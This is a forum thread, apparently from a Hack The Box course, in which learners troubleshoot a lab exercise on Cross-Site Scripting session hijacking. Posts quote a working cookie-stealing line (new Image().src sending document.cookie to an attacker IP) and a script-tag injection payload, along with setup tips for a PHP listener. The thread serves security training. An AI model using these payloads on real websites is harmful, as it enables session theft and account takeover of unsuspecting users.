HTB Backend Broken - Cross Site Scripting Session Hijacking - How to Work Around Broken Infrastructure?

I’ve been trying for hours now to get this very simple exercise done. Luckily, the VPN doesn’t work (after wasting a lot of time on trying to get it working properly), so I was able to just type everything directly into the PwnBox.

I’m able to get the script.js to download but after that, the site never reaches back out for index.php. After reading the forums, it seems that I’m not alone. Is there a way to get around this? Because the HTB infrastructure is broken, I think there’s got to be a different way than the obvious, simple solution.

1 Like

Hey dude! Sorry that you have been having a rough go of it. Paste the XSS line you are injecting into the form so we can help you. Edit Paste the contents of your script.js too, that might be the issue.

On a separate note, what errors were you getting with the VPN?

No problem. I used both of these along with the dynamically assigned IP:

new Image().src='http://IP/index.php?c='+document.cookie;

These were both tried as the contents of script.js. I even put <script>...stuff...</script> tags around it just in case I was missing something.

Then the XSS payload in the image field was updated to ...imgurl="><script src=http://IP:8080/script.js></script>. The XSS was successful and reached back to the PHP server I instantiated to grab the script. After that, silence. There was never a call to hit index.php (which was also in the same local directory as script.js.)

The VPN is as unstable as a one-legged stool. It drops for no reason (even though it’s configured as a VPN Connection in Kali’s network configuration settings). When it does work, it’s a hope and prayer that I will actually be able to connect to the resources. Sometimes they just time out and I get no response; other times it takes an incredible amount of time to load a resource/page; other times it works speedily with no problems. Pentesting is difficult enough as it is - it’s incredibly frustrating to drain even more time and mental bandwidth constantly chasing my tail in order to get basic resources to function properly. I have tried both US1 and US2 for endpoints.

Thanks for reaching out.

Alright, so your script.js looks like it should be good, as long as one of those is in there with the right IP:PORT. And then just make sure the index.php file is created without changes from the code they supply.

The XSS payload can probably look more like just this though. Though it might be a spoiler if you didn’t try all the payloads.

"><script src=http://IP:8080/script.js></script>

Guessing that you already made sure you were using the right field to complete the challenge? As only one field actually works from what I have found.

On the VPN topic. You shouldn’t need to configure anything to get the VPN to work. The vpn profile should be downloaded as something like username.ovpn and then you should just open a cli and run(maybe as root or with sudo) openvpn username.ovpn

At least that’s all I have ever done when I have used it and it has worked fine for me.

Give that XSS another go and if it still doesn’t work post screenshots of your XSS payload and script.js.

I have been noticing that the new pwnbox’s default to the /root directory, make sure that you are in the default home directory. That just got me when I started it up and did the challenge. Everything seems to be working fine on the backend though.

1 Like

hello @onthesauce !!
Still I am facing the same issue as specified by Joe earlier. My script.js looks like this-new Image().src=‘http:/’+document.cookie; and my index.php is the one which they supplied (I use the code as it is). Both index.php and script.js are located in the same directory /tmp/tmpserver…
And I start the PHP server using- sudo php -S…
I enter the payload as "> in the vulnerable field of the application. I get a callback on my PHP server only for script.js as shown in the attached pic and not for index.php.

Also one query is after uploading my payloads in the vuln field and the app shows as “Thank you for registering”, post this do I need to copy the entire URL of the application with the submitted payload and then again load this copied URL in the browser to get the cookie?

Request you to please support me on this as I ve been banging my head since 2 months. Earlier you have helped me out in one of the labs too so would appreciate if u could support here.

1 Like

I solved it thanks!!! @onthesauce

Hey no worries! Where was your problem?

Not sure though. The methodology was correct, but this time i started fresh and it suddenly worked out for good!
Thanks though for checking!
Am yet to solve mamy modules from now on, so no wonder i ll catch up with u very soon mate!!!
Please stay in touch and massive respect!
Merry Christmas💥 @onthesauce

1 Like

FOR FUTURE REFERENCE: make sure you put the port number in your script.js file…


you seem to have an excellent grasp on this. I am insanely stuck. I have followed all the steps, followed all the help, used the correct syntax and everything, but I don’t seem to get a response after I send the payload through. please help!

Thanks and no worries, XSS is a crazy hard module! DM me the steps you have gone through and the payload that you are submitting. I will double check it and see if I can help you out.

For those who encounter the problem: “(null) /script” I have a suggestion for you that you should start the php server listening in the directory where you are creating the script.js file. I had this problem before and tried again and it worked.

Hi, I am stuck at the session hijacking part. I run into a problem with the register form itself.

  1. it takes an eternity before the page is loaded (waiting for
  2. If I fill out the forms and click on the submit button nothing happens

I took a look into the dev tool and according to the functions at script.js, there should be some input validation and corresponding error messages for empty fields or invalid email, but I get nothing. In the second look, jquery-3.6.0.min.js is just an empty (0 B) file.

Before I start to blame HTB, have you any idea how to overcome this problem and even start with this part?

Hi, I seem to be experiencing a similar problem where the XSS is being executed and the script is being called, but my index.php does not seem to be logging any cookies. I am using the index.php as it should be and haven’t modified anything, and my xss payload is the following (pasted in the vulnerable parameter):


I’ve tried changing the default port number, and starting from fresh as suggested above but all im getting is the message “Closed without sending a request; it was probably just an unused speculative preconnection”

Any help would be much appreciated, thanks!

Hey man, I have the same problem. Have you solved it?

Hey sorry been a while but unfortunately not :frowning:

Ur forgetting to close the script with the </script (cant put the whole thing cus then its hidden form my comment)

I got stuck because of different characters when copy pasting code. I deleted and recreated one char and solved it. In my case it was ( ’ ).